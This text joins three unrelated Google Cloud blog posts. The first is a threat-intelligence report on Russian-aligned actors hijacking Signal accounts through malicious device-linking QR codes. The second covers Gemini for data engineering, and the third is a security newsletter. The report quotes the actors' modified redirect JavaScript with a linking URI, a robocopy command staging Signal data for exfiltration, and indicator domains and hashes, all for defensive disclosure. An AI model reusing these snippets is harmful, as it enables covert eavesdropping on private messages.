Google Threat Intelligence Group (GTIG) has observed increasing efforts from several Russia state-aligned threat actors to compromise Signal Messenger accounts used by individuals of interest to Russia’s intelligence services. While this emerging operational interest has likely been sparked by wartime demands to gain access to sensitive government and military communications in the context of Russia’s re-invasion of Ukraine, we anticipate the tactics and methods used to target Signal will grow in prevalence in the near-term and proliferate to additional threat actors and regions outside the Ukrainian theater of war.
Signal’s popularity among common targets of surveillance and espionage activity—such as military personnel, politicians, journalists, activists, and other at-risk communities—has positioned the secure messaging application as a high-value target for adversaries seeking to intercept sensitive information that could fulfil a range of different intelligence requirements. More broadly, this threat also extends to other popular messaging applications such as WhatsApp and Telegram, which are also being actively targeted by Russian-aligned threat groups using similar techniques. In anticipation of a wider adoption of similar tradecraft by other threat actors, we are issuing a public warning regarding the tactics and methods used to date to help build public awareness and help communities better safeguard themselves from similar threats.
We are grateful to the team at Signal for their close partnership in investigating this activity. The latest Signal releases on Android and iOS contain hardened features designed to help protect against similar phishing campaigns in the future. Update to the latest version to enable these features.
The most novel and widely used technique underpinning Russian-aligned attempts to compromise Signal accounts is the abuse of the app’s legitimate “linked devices” feature that enables Signal to be used on multiple devices concurrently. Because linking an additional device typically requires scanning a quick-response (QR) code, threat actors have resorted to crafting malicious QR codes that, when scanned, will link a victim’s account to an actor-controlled Signal instance. If successful, future messages will be delivered synchronously to both the victim and the threat actor in real-time, providing a persistent means to eavesdrop on the victim’s secure conversations without the need for full-device compromise.
In remote phishing operations observed to date, malicious QR codes have frequently been masked as legitimate Signal resources, such as group invites, security alerts, or as legitimate device pairing instructions from the Signal website.
In more tailored remote phishing operations, malicious device-linking QR codes have been embedded in phishing pages crafted to appear as specialized applications used by the Ukrainian military.
Beyond remote phishing and malware delivery operations, we have also seen malicious QR codes being used in close-access operations. APT44 (aka Sandworm or Seashell Blizzard, a threat actor attributed by multiple governments to the Main Centre for Special Technologies (GTsST) within Main Directorate of the General Staff of the Armed Forces of the Russian Federation (GU), known commonly as the GRU) has worked to enable forward-deployed Russian military forces to link Signal accounts on devices captured on the battlefield back to actor-controlled infrastructure for follow-on exploitation.
Notably, this device-linking concept of operations has proven to be a low-signature form of initial access due to the lack of centralized, technology-driven detections and defenses that can be used to monitor for account compromise via newly linked devices; when successful, there is a high risk that a compromise can go unnoticed for extended periods of time.
UNC5792: Modified Signal Group Invites
To compromise Signal accounts using the device-linking feature, one suspected Russian espionage cluster tracked as UNC5792 (which partially overlaps with CERT-UA’s UAC-0195) has altered legitimate “group invite” pages for delivery in phishing campaigns, replacing the expected redirection to a Signal group with a redirection to a malicious URL crafted to link an actor-controlled device to the victim’s Signal account.
In these operations, UNC5792 has hosted modified Signal group invitations on actor-controlled infrastructure designed to appear identical to a legitimate Signal group invite.
In each of the fake group invites, JavaScript code that typically redirects the user to join a Signal group has been replaced by a malicious block containing the Uniform Resource Identifier (URI) used by Signal to link a new device to Signal (i.e., “sgnl://linkdevice?uuid=”), tricking victims into linking their Signal accounts to a device controlled by UNC5792.
Figure 1: Example modified Signal group invite hosted on UNC5792-controlled domain “signal-groups[.]tech”
function doRedirect() {
if (window.location.hash) {
var redirect = "sgnl://signal.group/" + window.location.hash
document.getElementById('go-to-group').href = redirect
window.location = redirect
} else {
document.getElementById('join-button').innerHTML = "No group found."
window.onload = doRedirect
Figure 2: Typical legitimate group invite code for redirection to a Signal group
function doRedirect() {
var redirect = 'sgnl://linkdevice
uuid=h_8WKmzwam_jtUeoD_NQyg%3D%3D
pub_key=Ba0212mHrGIy4t%2FzCCkKkRKwiS0osyeLF4j1v8DKn%2Fg%2B'
//redirect=encodeURIComponent(redirect)
document.getElementById('go-to-group').href = redirect
window.location = redirect
window.onload = doRedirect
Figure 3: Example of UNC5792 modified redirect code used to link the victim’s device to an actor-controlled Signal instance
UNC4221: Custom-Developed Signal Phishing Kit
UNC4221 (tracked by CERT-UA as UAC-0185) is an additional Russia-linked threat actor who has actively targeted Signal accounts used by Ukrainian military personnel. The group operates a tailored Signal phishing kit designed to mimic components of the Kropyva application used by the Armed Forces of Ukraine for artillery guidance. Similar to the social engineering approach used by UNC5792, UNC4221 has also attempted to mask its device-linking functionality as an invite to a Signal group from a trusted contact. Different variations of this phishing kit have been observed, including:
Phishing websites that redirect victims to secondary phishing infrastructure masquerading as legitimate device-linking instructions provisioned by Signal (Figure 4)
Phishing websites with the malicious device-linking QR code directly embedded into the primary Kropyva-themed phishing kit (Figure 5)
In earlier operations in 2022, UNC4221 phishing pages were crafted to appear as a legitimate security alert from Signal (Figure 6)
Figure 4: Malicious device-linking QR code hosted on UNC4221-controlled domain “signal-confirm[.]site”
Figure 5: UNC4221 phishing page mimicking the networking component of Kropyva hosted at “teneta.add-group[.]site”. The page invites the user to “Sign in to Signal” (Ukrainian: “Авторизуватись у Signal”), which in turn displays a QR code linked to an UNC4221-controlled Signal instance.
Figure 6: Phishing page crafted to appear as a Signal security alert hosted on UNC4221-controlled domain signal-protect[.]host
Notably, as a core component of its Signal targeting, UNC4221 has also used a lightweight JavaScript payload tracked as PINPOINT to collect basic user information and geolocation data using the browser’s GeoLocation API. In general, we expect to see secure messages and location data to frequently feature as joint targets in future operations of this nature, particularly in the context of targeted surveillance operations or support to conventional military operations.
Wider Russian and Belarusian Efforts to Steal Messages From Signal
Beyond targeted efforts to link additional actor-controlled devices to victim Signal accounts, multiple known and established regional threat actors have also been observed operating capabilities designed to steal Signal database files from Android and Windows devices.
APT44 has been observed operating WAVESIGN, a lightweight Windows Batch script, to periodically query Signal messages from a victim’s Signal database and exfiltrate those most recent messages using Rclone (Figure 7).
As reported in 2023 by the Security Service of Ukraine (SSU) and the UK’s National Cyber Security Centre (NCSC), the Android malware tracked as Infamous Chisel and attributed by the respective organizations to Sandworm, is designed to recursively search for a list of file extensions including the local database for a series of messaging applications, including Signal, on Android devices.
Turla, a Russian threat actor attributed by the United States and United Kingdom to Center 16 of the Federal Security Service (FSB) of the Russian Federation, has also operated a lightweight PowerShell script in post-compromise contexts to stage Signal Desktop messages for exfiltration (Figure 8).
Extending beyond Russia, Belarus-linked UNC1151 has used the command-line utility Robocopy to stage the contents of file directories used by Signal Desktop to store messages and attachments for later exfiltration (Figure 9).
Figure 8:PowerShell script used by Turla to exfiltrate Signal messages
C:Windowssystem32cmd.exe /C cd %appdata% && robocopy
"%userprofile%AppDataRoamingSignal" C:UsersPublicdatasigna /S
Figure 9:Robocopy command used by UNC1151 to stage Signal file directories for exfiltration
Outlook and Implications
The operational emphasis on Signal from multiple threat actors in recent months serves as an important warning for the growing threat to secure messaging applications that is certain to intensify in the near-term. When placed in a wider context with other trends in the threat landscape, such as the growing commercial spyware industry and the surge of mobile malware variants being leveraged in active conflict zones, there appears to be a clear and growing demand for offensive cyber capabilities that can be used to monitor the sensitive communications of individuals who rely on secure messaging applications to safeguard their online activity.
As reflected in wide ranging efforts to compromise Signal accounts, this threat to secure messaging applications is not limited to remote cyber operations such as phishing and malware delivery, but also critically includes close-access operations where a threat actor can secure brief access to a target’s unlocked device. Equally important, this threat is not only limited to Signal, but also extends to other widely used messaging platforms, including WhatsApp and Telegram, which have likewise factored into the targeting priorities of several of the aforementioned Russia-aligned groups in recent months. For an example of this wider targeting interest, see Microsoft Threat Intelligence’s recent blog post on a COLDRIVER (aka UNC4057 and Star Blizzard) campaign attempting to abuse the linked device feature to compromise WhatsApp accounts.
Potential targets of government-backed intrusion activity targeting their personal devices should adopt practices to help safeguard themselves, including:
Enable screen lock on all mobile devices using a long, complex password with a mix of uppercase and lowercase letters, numbers, and symbols. Android supports alphanumeric passwords, which offer significantly more security than numeric-only PINs or patterns.
Install operating system updates as soon as possible and always use the latest version of Signal and other messaging apps.
Ensure Google Play Protect is enabled, which is on by default on Android devices with Google Play Services. Google Play Protect checks your apps and devices for harmful behavior and can warn users or block apps known to exhibit malicious behavior, even when those apps come from sources outside of Play.
Audit linked devices regularly for unauthorized devices by navigating to the “Linked devices” section in the application’s settings.
Exercise caution when interacting with QR codes and web resources purporting to be software updates, group invites, or other notifications that appear legitimate and urge immediate action.
If available, use two-factor authentication such as fingerprint, facial recognition, a security key, or a one-time code to verify when your account is logged into or linked to a new device.
iPhone users concerned about targeted surveillance or espionage activity should consider enabling Lockdown Mode to reduce their attack surface.
Indicators of Compromise
To assist organizations hunting and identifying activity outlined in this blog post, we have included indicators of compromise (IOCs) in a GTI Collection for registered users.
See Table 1 for a sample of relevant indicators of compromise.
Actor
Indicator of Compromise
Context
UNC5792
e078778b62796bab2d7ab2b04d6b01bf
Example of altered group invite HTML code
add-signal-group[.]com
add-signal-groups[.]com
group-signal[.]com
groups-signal[.]site
signal-device-off[.]online
signal-group-add[.]com
signal-group[.]com
signal-group[.]site
signal-group[.]tech
signal-groups-add[.]com
signal-groups[.]site
signal-groups[.]tech
signal-security[.]online
signal-security[.]site
signalgroup[.]site
signals-group[.]com
Fake group invite phishing pages
UNC4221
signal-confirm[.]site
confirm-signal[.]site
Device-linking instructions phishing page
signal-protect[.]host
Fake Signal security alert
teneta.join-group[.]online
teneta.add-group[.]site
group-teneta[.]online
helperanalytics[.]ru
group-teneta[.]online
teneta[.]group
group.kropyva[.]site
Fake Kropyva group invites
APT44
150.107.31[.]194:18000
Dynamically generated device-linking QR code provisioned by APT44
a97a28276e4f88134561d938f60db495
b379d8f583112cad3cf60f95ab3a67fd
b27ff24870d93d651ee1d8e06276fa98
WAVESIGN batch scripts
Table 1: Relevant indicators of compromise
See Table 2 for a summary of the different actors, tactics, and techniques used by Russia and Belarus state-aligned threat actors to target Signal messages.
Threat Actor
Tactic
Technique
UNC5792
Linked device
Remote phishing operations using fake group invites to pair a victim’s Signal messages to an actor-controlled device
UNC4221
Linked device
Remote phishing operations using fake military web applications and security alerts to pair a victim’s Signal messages to an actor-controlled device
APT44
Linked device
Close-access physical device exploitation to pair a victim’s Signal messages to an actor-controlled device
Signal Android database theft
Android malware (Infamous Chisel) tailored to exfiltrate Signal database files
Signal Desktop database theft
Windows Batch script tailored to periodically exfiltrate recent Signal messages via Rclone
Turla
Signal Desktop database theft
Post-compromise activity in Windows environments
UNC1151
Signal Desktop database theft
Use of Robocopy to stage Signal Desktop file directories for exfiltration
Table 2: Summary of observed threat activity targeting Signal messages
In the realm of data engineering, generative AI models are quietly revolutionizing how we handle, process, and ultimately utilize data. For example, large language models (LLMs) can help with data schema handling, data quality, and even data generation.
Building upon the recently released Gemini in BigQuery Data preparation capabilities, this blog showcases areas where gen AI models are making a significant impact in data engineering with automated solutions for schema management, data quality automation, and generation of synthetic and structured data from diverse sources, providing practical examples and code snippets.
1. Data schema handling: Integrating new datasets
Data movement and maintenance is an ongoing challenge across all data engineering teams. Whether it’s moving data between systems with different schemas or integrating new datasets into existing data products, the process can be complex and error-prone. This is often exacerbated when dealing with legacy systems; in fact, 32% of organizations cite migrating the data and the app as their biggest challenge, according to Flexera’s 2024 State of the Cloud Report.
Gen AI models offer a powerful solution by assisting in automating schema mapping and transformation on an ongoing basis. Imagine migrating customer data from a legacy CRM system to a new platform, and combining it with additional external datasets in BigQuery. The schemas likely differ significantly, requiring intricate mapping of fields and data types. Gemini, our most capable AI model family to date, can analyze both schemas and generate the necessary transformation logic, significantly reducing manual effort and potential errors.
A common approach to data schema handling that we’ve seen from data engineering teams involves creating a lightweight application that receives messages from Pub/Sub, retrieves relevant dataset information from BigQuery and Cloud Storage, and uses the Vertex AI Gemini API to map source fields to target fields and assign a confidence score. Here is example code showing a FunctionDeclaration to perform the mapping-confidence task:
code_block
<ListValue: [StructValue([(‘code’, ‘set_source_field_mapping_confidence_levels = generative_models.FunctionDeclaration(rn name=”set_source_field_mapping_confidence_levels”,rn description=”””Sets the mapping confidence values for each source field for a given target field.rnrnHere is a general example to help you understand how to use the set_source_field_mapping_confidences_tool correctly. This is only an example to show the source and target field structures.:rnrnAssuming you had previously decided on the following mapping confidence levels (but it is important that you come up with your own values for mapping condifence level rather than specifically using these values):rna mapping confidence level of 2 for the field with source_field_unique_ref=158rna mapping confidence level of 1 for the field with source_field_unique_ref=159rna mapping confidence level of 1 for the field with source_field_unique_ref=1290rna mapping confidence level of 1 for the field with source_field_unique_ref=579rna mapping confidence level of 1 for the field with source_field_unique_ref=638rna mapping confidence level of 1 for the field with source_field_unique_ref=970rna mapping confidence level of 1 for the field with source_field_unique_ref=3317rna mapping confidence level of 3 for the field with source_field_unique_ref=160rna mapping confidence level of 1 for the field with source_field_unique_ref=1910rna mapping confidence level of 5 for the field with source_field_unique_ref=2280rnrnThen this function would be used to set the mapping confidence levels for each of the source fields, where your input parameter source_field_mapping_confidences would be:rnsource_field_mapping_confidences = [rn {‘source_field_unique_ref’:158,’mapping_confidence_level’:’2′},rn {‘source_field_unique_ref’:159,’mapping_confidence_level’:’2′},rn {‘source_field_unique_ref’:1290,’mapping_confidence_level’:’1′},rn {‘source_field_unique_ref’:579,’mapping_confidence_level’:’1′},rn {‘source_field_unique_ref’:638,’mapping_confidence_level’:’1′},rn {‘source_field_unique_ref’:970,’mapping_confidence_level’:’1′},rn {‘source_field_unique_ref’:3317,’mapping_confidence_level’:’1′},rn {‘source_field_unique_ref’:160,’mapping_confidence_level’:’3′},rn {‘source_field_unique_ref’:1910,’mapping_confidence_level’:’1′},rn {‘source_field_unique_ref’:2280,’mapping_confidence_level’:’5′}rn]”””,rnrn parameters={rn “type”: “object”,rn “properties”: {rn “source_field_mapping_confidences”: {rn “type”: “array”,rn “description”: “A List of objects where each object in the list contains the source field’s source_field_unique_ref, the mapping_confidence_level for that source field and the reason for applying that mapping_confidence_level.”,rn “items”: {rn “type”: “object”,rn “properties”: {rn “source_field_unique_ref”: {rn “type”: “integer”,rn “description”: “The reference ID for the source field.”rn },rn “mapping_confidence_level”: {rn “type”: “string”,rn “enum”: [“1”, “2”, “3”, “4”, “5”],rn “description”: “The confidence level for the mapping (an integer between 1 and 5).”rn },rn “mapping_confidence_level_reason”: {rn “type”: “string”,rn “description”: “The reason why the source field should have this mapping confidence level value”rn }rn },rn “required”: [“source_field_unique_ref”, “mapping_confidence_level”, “mapping_confidence_level_reason”]rn }rn },rn },rn “required”: [“source_field_mapping_confidences”],rn },rn )’), (‘language’, ‘lang-py’), (‘caption’, <wagtail.rich_text.RichText object at 0x3ec7e0269850>)])]>
As seen in the above prompt, Gemini assigns confidence levels to each mapping, which are then stored in BigQuery. Once these are in BigQuery, the data engineering team can validate high-confidence mappings (and eventually choose to fully automate these if they feel comfortable), and investigate the low-confidence mappings. This pipeline of gen AI tasks could be deployed in an event-driven architecture or could run on a batch basis. However, there’s usually a final step required, where a human approves the final output (this could eventually become fully automated over time, given the rapid release cadence of improvements in gen AI models). Here is an example architecture / workflow:
2. Data quality: Enhancing accuracy and consistency
In today’s data-driven world, poor data quality can cost businesses millions. From inaccurate customer insights leading to misguided marketing campaigns, to flawed financial reporting that impacts investment decisions, the consequences of bad data are significant. Gen AI models offer a new approach to data quality, going beyond traditional rule-based systems to identify subtle inconsistencies that can wreak havoc on your data pipelines. For example, imagine a system that can automatically detect and correct errors that would typically require hours of manual review or creation of intensive ReGex expressions.
Gemini can augment your existing data quality checks in several ways:
Deduplication: Consider a scenario where you need to deduplicate customer profiles. Gemini can analyze various fields, such as names, addresses, and phone numbers, to identify potential duplicates, even when there are minor variations in spelling or formatting. For example, Gemini can recognize that “Robert Smith” and “Bob Smith” likely refer to the same individual, or that “123 Main St.” and “123 Main Street” represent the same address. In contrast to traditional methods like fuzzy matching, which are cumbersome to code and don’t always produce ideal results, using an LLM can provide a simpler and more effective solution.
Standardization: Gemini excels at standardizing data formats. Instead of relying on intricate regular expressions to validate data formats, Gemini can be used with prompt engineering, RAG, or fine-tuning to understand and enforce data quality rules in a more human-readable and maintainable way. This is particularly useful for fields like dates, times, and addresses, where variations in format can hinder analysis.
Subtle error detection: Gemini can identify subtle inconsistencies that might be missed by traditional methods. These include:
Variations in abbreviations (e.g., “St.” vs “Street”)
Different spellings of the same name (e.g., “Catherine” vs. “Katherine”)
Use of nicknames (e.g., “Bob” vs. “Robert”)
Incorrectly formatted phone numbers (e.g., missing area codes)
Inconsistent use of capitalization and punctuation
Let’s illustrate this with a common example of address validation. We have a table named customer_addresses with the following format, and we want to check if the address_state column is a valid US state and convert it into the standard two-letter abbreviation:
Looking at the input data, you can easily identify some issues with the address_state column. For example, ‘Pennsylvaniaa’ is misspelled, and ‘Texas’ is written out instead of using the standard two-letter abbreviation. While these errors are obvious to a human, they can be challenging for traditional data quality tools to catch because they rely on exact matches or rigid rules, missing these subtle variations.
However, Gemini excels at understanding and interpreting human language, making it well suited for this task. With a simple prompt, Gemini can accurately identify these inconsistencies and standardize the state names into the correct format, going beyond rigid rules and adapting to nuances of the human language.
Here’s how you can use Gemini in BigQuery to perform this task, using the BQML function ML. GENERATE_TEXT, which lets you perform gen AI tasks on data stored in BigQuery using a remote connection to Gemini hosted in Vertex AI:
code_block
<ListValue: [StructValue([(‘code’, “SELECTrn prompt,rn REPLACE(REPLACE(REPLACE(ml_generate_text_llm_result,’json’,”),’\n’,”),’“`’,”) asrn ml_generate_text_llm_result,rn address_id,rn address_line1,rn address_line2,rn address_city,rn address_state,rn address_zipcode,rn address_country,rnFROMrn ML.GENERATE_TEXT( MODEL `bigquery_demo.gemini-pro`,rn (rn SELECTrn CONCAT( ‘Check if the given address_state field is as per ANSI 2-letter standard.If not,convert it into the recommended format.Also check if the address_state is a valid US state.Return only the output with input,output and is_valid_us_state fields. address_state:’, address_state) AS prompt,rn *rn FROMrn `bigquery_demo.customer_addresses` ),rn STRUCT (TRUE AS flatten_json_output));”), (‘language’, ”), (‘caption’, <wagtail.rich_text.RichText object at 0x3ec7e0269910>)])]>
This code sends each address_state value to Gemini with a prompt asking it to validate and standardize the input. Gemini then returns a JSON response with the original input, the standardized output, and a boolean indicating whether the state is valid:
In this instance, Gemini has automated and streamlined our data quality process and reduced the complexity of the code. The first column contains the validation output — with a simple prompt, we are able to correctly identify the rows that have an invalid state column value and convert the state columns to a standard format. In the more traditional approach this would have taken multiple SQL expressions, external APIs, or joining with a lookup table.
The above example is just a glimpse into how Gemini can improve data quality. But beyond basic validation and standardization, gen AI models also excel at more nuanced tasks. For instance, they can classify data errors by severity (low, medium, high) for prioritized action and effectively handle mixed-language text fields by detecting language discrepancies. For more detailed examples check out this code repo, which includes how to leverage gen AI models for semantic search in BigQuery that you could use to identify duplicate records.
Important considerations for large datasets:
When working with large datasets, sending individual requests to an LLM like Gemini can become inefficient and may exceed usage quotas. To optimize performance and manage costs, consider batching requests and make sure your GCP project has sufficient API quotas.
aside_block
<ListValue: [StructValue([(‘title’, ‘$300 in free credit to try Google Cloud data analytics’), (‘body’, <wagtail.rich_text.RichText object at 0x3ec7e0269e50>), (‘btn_text’, ‘Start building for free’), (‘href’, ‘http://console.cloud.google.com/freetrial?redirectPath=/bigquery/’), (‘image’, None)])]>
3. Data generation: Unlocking insights from unstructured data
Unstructured data like images, videos, and PDFs hold valuable information that has historically been difficult to translate into structured data use cases. Gemini’s multimodal industry-leading context window of up to 2 million tokens allows us to extract structured data for downstream usage.
However, some gen AI models can be unreliable and prone to hallucinations, posing challenges for consistent data processing. To address this in practice, you can useGemini’s system instructions, controlled generation, grounding with Gemini, and Vertex AI evaluation services. System instructions guide the model’s behavior, while controlled generation instructs the models to output in specific format such as JSON and enforces structured outputs adhering to a predefined schema. Evaluation lets you automate the selection process of the best response and provide associated quality metrics and explanations. Finally, grounding tethers the output to private or public up-to-date data, reducing the likelihood of the model inventing content. Then, the model’s structured data output can be integrated with BigQuery for downstream analysis and used in data pipelines and ML workflows, helping to ensure consistency and reliability in business applications.
Let’s take a look at an example inspired by the YouTube ABCDs where we use one of the latest Gemini models, Flash 2.0, to analyze an ad video on YouTube to see if it follows YouTube best practices, using the following prompt:
code_block
<ListValue: [StructValue([(‘code’, ‘from google import genairnfrom google.genai import typesrnimport base64rnrnrndef generate():rn client = genai.Client(rn vertexai=True,rn project=”YOUR_PROJECT_ID”,rn location=”us-central1″,rn )rnrnrn text1 = types.Part.from_text(“””You are a creative expert who analyzes and labels video ads to answerrn specific questions about the content in the video and how it adheres to a set of features.rn Answer the following questions with either \\\”True\\\” or \\\”False\\\” and provide a detailed explanation torn support your answer. The explanation should be thorough and logically sound, incorporating relevantrn facts and reasoning. Only base your answers strictly on what information is available in the videorn attached. Do not make up any information that is not part of the video.rn rn These are the questions that you have to answer for each feature:rn1. does the brand show in the first 5 seconds?rn2. is there consistent brand presence throughout the ad video?rn3. is there a clear call to action in the ad?”””)rn video1 = types.Part.from_uri(rn file_uri=”https://www.youtube.com/watch?v=OMVpP-Zam1A”,rn mime_type=”video/*”,rn )rnrnrn model = “gemini-2.0-flash-exp”rn contents = [rn types.Content(rn role=”user”,rn parts=[rn text1,rn video1rn ]rn )rn ]rn generate_content_config = types.GenerateContentConfig(rn temperature = 1,rn top_p = 0.95,rn max_output_tokens = 8192,rn response_modalities = [“TEXT”],rn safety_settings = [types.SafetySetting(rn category=”HARM_CATEGORY_HATE_SPEECH”,rn threshold=”OFF”rn ),types.SafetySetting(rn category=”HARM_CATEGORY_DANGEROUS_CONTENT”,rn threshold=”OFF”rn ),types.SafetySetting(rn category=”HARM_CATEGORY_SEXUALLY_EXPLICIT”,rn threshold=”OFF”rn ),types.SafetySetting(rn category=”HARM_CATEGORY_HARASSMENT”,rn threshold=”OFF”rn )],rn response_mime_type = “application/json”,rn response_schema = {“type”:”ARRAY”,”items”:{“type”:”OBJECT”,”properties”:{“id”:{“type”:”STRING”},”name”:{“type”:”STRING”},”category”:{“type”:”STRING”},”criteria”:{“type”:”STRING”},”detected”:{“type”:”BOOLEAN”},”llm_explanation”:{“type”:”STRING”}},”required”:[“id”,”name”,”category”,”criteria”,”detected”,”llm_explanation”]}},rn},rn )rnrnrn for chunk in client.models.generate_content_stream(rn model = model,rn contents = contents,rn config = generate_content_config,rn ):rn print(chunk, end=””)rnrnrngenerate()’), (‘language’, ‘lang-py’), (‘caption’, <wagtail.rich_text.RichText object at 0x3ec7e02694c0>)])]>
The resulting output can easily be ingested into BigQuery as structured data for further analytical and reporting uses:
code_block
<ListValue: [StructValue([(‘code’, ‘[{“category”: “Brand Presence”, “criteria”: “Does the brand show in the first 5 seconds?”, “detected”: true, “id”: “brand_first_5_seconds”, “llm_explanation”: “The brand name Gemini shows up within the first 5 seconds of the video ad, clearly visible on the screen along with the text prompt that is shown.”rn, “name”: “Brand Visibility”}, rn{“category”: “Brand Presence”, “criteria”: “Is there consistent brand presence throughout the ad video?”, “detected”: true, “id”: “consistent_brand_presence”, “llm_explanation”: “The brand name Gemini remains consistently visible in the upper left corner of the screen throughout the duration of the video ad, ensuring brand awareness.” , “name”: “Consistent Branding”}, rn{“category”: “Call to Action”, “criteria”: “Is there a clear call to action in the ad?”, “detected”: true, “id”: “clear_call_to_action”, “llm_explanation”: “The video ad concludes by displaying a clear call to action directing viewers to GoogleStore.com to learn more, providing a direct path for engagement with the brand and product. ” , “name”: “Call To Action”}]’), (‘language’, ”), (‘caption’, <wagtail.rich_text.RichText object at 0x3ec7e02698b0>)])]>
There are also considerations for choosing the right model for the right task. For example, larger videos or unstructured content may require using the 2M token context window, available from Gemini Pro, whereas other tasks may be fine using just 1M context window with Gemini Flash.
You can also use Gemini to generate synthetic data that mimics real-world scenarios, augmenting your datasets and improving model performance. Synthetic data is artificially generated data that statistically mirrors real-world data while preserving privacy by excluding personally identifiable information (PII). This approach enables organizations to develop robust machine learning models and data-driven insights without the limitations and risks associated with using real-world data. The growing interest in synthetic data stems from its ability to address privacy concerns, overcome data scarcity, and facilitate test data generation across various industries. To learn more about synthetic data generation using gen AI, check out our in-depth blog about Generating synthetic data in BigQuery with Gretel.
Going to production: DataOps and the LLM pipeline
Once you’ve successfully implemented LLM-powered data engineering solutions, you’re ready to integrate them into your production environment. Here are a few things you’ll need to address:
Scheduling and automation: Leverage tools like Composer or Vertex AI Pipelines to schedule and automate gen AI tasks, to help ensure continuous data processing and analysis.
Model monitoring and evaluation: Implementing an evaluation pipeline to monitor the performance of your gen AI models allows you to track accuracy, identify potential biases, and trigger retraining when necessary.
Version control: Treat Gemini prompts and configurations as code, using version control systems to track changes and ensure reproducibility.
The following resources are useful for integrating gen AI models into your data engineering production pipelines, and deliver robust, scalable, and reliable solutions:
Transform your data engineering processes with gen AI
Gen AI is transforming the data engineering landscape, offering powerful capabilities for schema handling, data quality improvement, synthetic data generation, and data generation from unstructured sources. By embracing these advancements and adopting DataOps principles, get ready to unlock new levels of efficiency, accuracy, and insight from your data. Start experimenting with Gemini in your own data pipelines and unlock the potential for greater consistency in data processing, insights from new data sources, and ultimately, better business outcomes.
Welcome to the first Cloud CISO Perspectives for February 2025. Stephanie Kiel, our head of cloud security policy, government affairs and public policy, discusses two parallel and important security conversations she had at the Munich Security Conference, following our new reports on AI and cybercrime.
As with all Cloud CISO Perspectives, the contents of this newsletter are posted to the Google Cloud blog. If you’re reading this on the website and you’d like to receive the email version, you can subscribe here.
–Phil Venables, VP, TI Security & CISO, Google Cloud
aside_block
<ListValue: [StructValue([(‘title’, ‘Get vital board insights with Google Cloud’), (‘body’, <wagtail.rich_text.RichText object at 0x3e357a3ae610>), (‘btn_text’, ‘Visit the hub’), (‘href’, ‘https://cloud.google.com/solutions/security/board-of-directors?utm_source=cloud_sfdc&utm_medium=email&utm_campaign=FY24-Q2-global-PROD941-physicalevent-er-CEG_Boardroom_Summit&utm_content=-&utm_term=-‘), (‘image’, <GAEImage: GCAT-replacement-logo-A>)])]>
New AI, cybercrime reports underscore need for security best practices
By Stephanie Kiel, head of cloud security policy, government affairs and public policy, Google Cloud
Artificial intelligence has altered the world in a way that few technologies have, from how citizens procure goods, to the delivery of education and health services, to how digital networks are protected. Faced with operational pressures and resource constraints, malicious actors are turning to new methods of scaling their operations — including experimenting with AI and mobilizing cybercriminal communities by mixing ransomware development with intelligence collection.
Stephanie Kiel, head of cloud security policy, government affairs and public policy, Google Cloud
These two evolutionary examples underscore the need for organizations to continue to prioritize and review security fundamentals as part of their risk-management posture.
Together these two new reports highlight four important themes:
Adversarial actors will continue to seek opportunities to use new technologies to their advantage.
Policymakers should consider mechanisms to enable bold and responsible innovation in the service of defense.
Innovation can help with defense, but strong network resilience practices should also be prioritized.
Collaboration across sectors and stakeholders remains key as organizations develop and implement their own risk management plans.
Adversaries and innovation
As technological advances occur, it is necessary to keep in mind that opportunistic malicious actors will also want to use them to their advantage. Our adversarial misuse of Gemini report suggests that threat actors are using Gemini for productivity gains, but Gemini’s built-in safeguards have prevented them from using Google’s AI capabilities for more disruptive purposes.
As these new technologies are adopted broadly, it is essential to keep in mind the importance of resilience and security best practices.
This underscores both the importance of safe and secure development of AI capabilities and enabling the use of such capabilities to the greatest extent possible in the service of cybersecurity.
Enabling defense
While malicious actors work to apply AI capabilities for nefarious purposes, we believe the scales of AI still tip in the favor of network defense. Similarly, network defenders can use AI capabilities to improve secure software development and deployment practices. Generative AI can help optimize the bandwidth of cyber defenders where the workforce is limited, and implement solutions where defenders are not available.
Continued importance of traditional best practices
As these new technologies are adopted broadly, it is essential to keep in mind the importance of resilience and security best practices.
While we track how threat actors use new technologies such as generative AI, organizations need to shore up defenses against known, longstanding malicious tactics, techniques, and procedures, and to develop risk management strategies accordingly. There is no substitute for a strong foundation based on robust adoption of cybersecurity measures, and support for initiatives that enhance the resilience of digital systems (including uptake of new security technologies, where possible).
Collaboration to drive defense
Collaboration across sectors and stakeholders is critical for defense as well. Countries must work with each other and the private sector on systemic solutions for achieving broader success against malicious cyber activity, as highlighted in our new cybercrime report.
The stakes are high. When hospitals are locked out of critical systems, patient care suffers. When water delivery is disrupted, entire communities are left vulnerable. The effects of cybercrime extend far beyond stolen money or data breaches; they erode public trust, and destabilize essential services. Continued malicious cyberattacks demand strong, collaborative action.
We look forward to continued partnership with customers, governments, and other stakeholders to drive advantages for network defense.
<ListValue: [StructValue([(‘title’, ‘Join the Google Cloud CISO Community’), (‘body’, <wagtail.rich_text.RichText object at 0x3e357a3ae850>), (‘btn_text’, ‘Learn more’), (‘href’, ‘https://rsvp.withgoogle.com/events/ciso-community-interest?utm_source=cgc-blog&utm_medium=blog&utm_campaign=2024-cloud-ciso-newsletter-events-ref&utm_content=-&utm_term=-‘), (‘image’, <GAEImage: GCAT-replacement-logo-A>)])]>
In case you missed it
Here are the latest updates, products, services, and resources from our security teams so far this month:
Next ‘25 can help elevate your cybersecurity skills. Here’s how: From red teaming to tabletop exercises to the SOC Arena, Next ’25 has something for security pros and newcomers alike. Read more.
How Google manages vulnerability detection and remediation: How does Google handle vulnerabilities? Ana Oprea shares core practices behind Google’s vulnerability management program, as part of our new “How Google Does It” series. Read more.
Safeguarding users and strengthening national security: AI holds immense possibilities for cybersecurity — and also economic and national security. We’re offering new recommendations for policymakers, threat research on the adversarial misuse of AI, and insights on the role AI will play in national security, as well as initiatives designed to safeguard users and strengthen cyber defense in the AI era. Read more.
5 ways Google Cloud can help you minimize credential theft risk: Here’s five ways to protect your cloud deployments from threat actors exploiting compromised cloud identities. Read more.
Secure-by-design blueprint for a high-assurance web framework: Following years of work where we’ve reduced the number of critical web vulnerabilities such as XSS in Google applications by more than order of magnitude, we’re proposing a new, detailed blueprint based on how we created this high-assurance web framework that almost completely eliminates exploitable web vulnerabilities. Read more.
Our 2024 Responsible AI report: Our sixth annual Responsible AI Progress Report details how we govern, map, measure, and manage AI risk throughout the AI development lifecycle. The report highlights the progress we have made over the past year building governance structures for our AI product launches. Read more.
$15 million to support hands-on cybersecurity education: Google.org is announcing support for universities across Europe, the Middle East and Africa that will help expand access to cybersecurity education for thousands of students. Read more.
